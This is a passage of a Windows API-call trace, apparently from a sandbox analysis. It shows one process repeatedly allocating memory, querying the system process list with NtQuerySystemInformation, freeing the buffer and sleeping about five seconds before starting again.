ResultLength=0x0) returned 0xc0000004 [0234.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.364] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.379] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.429] NtAllocateVirtualMemory (in: 